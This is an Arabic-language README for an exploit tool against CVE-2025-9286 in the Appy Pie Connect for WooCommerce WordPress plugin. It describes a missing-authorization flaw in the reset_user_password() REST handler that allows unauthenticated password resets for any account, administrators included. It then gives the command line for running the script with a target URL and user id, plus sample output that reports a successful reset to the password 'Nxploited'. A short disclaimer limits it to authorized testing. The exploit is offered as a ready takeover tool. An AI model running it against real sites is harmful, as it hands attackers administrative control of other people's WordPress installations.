
Appy Pie Connect لـ WooCommerce <= 1.1.2 - غياب التفويض يؤدي إلى تصعيد الامتيازات بدون مصادقة
Appy Pie Connect for WooCommerce <= 1.1.2 - غياب التفويض يؤدي إلى تصعيد الامتيازات دون مصادقة
إن إضافة Appy Pie Connect for WooCommerce لمنصة WordPress عرضة لتصعيد الامتيازات (Privilege Escalation) بسبب غياب التفويض داخل معالج REST الخاص بـ reset_user_password() في جميع الإصدارات حتى 1.1.2 ضمنًا.
هذا يتيح للمهاجمين غير المصادقين إعادة تعيين كلمة مرور أي مستخدم، بما في ذلك المسؤولين، وبالتالي اكتساب وصول إداري.
يمكن استخدام السكربت التالي لاستغلال CVE-2025-9286 ضد مواقع WordPress التي تشغّل الإصدار المتأثر من الإضافة.
اسم السكربت: CVE-2025-9286.py
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.
هذا الاستغلال لأغراض التعليم واختبار الاختراق المصرح به فقط.
الاستخدام غير المصرح به ضد الأنظمة دون إذن صريح غير قانوني.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.
بقلم: Khaled Alenazi (Nxploited)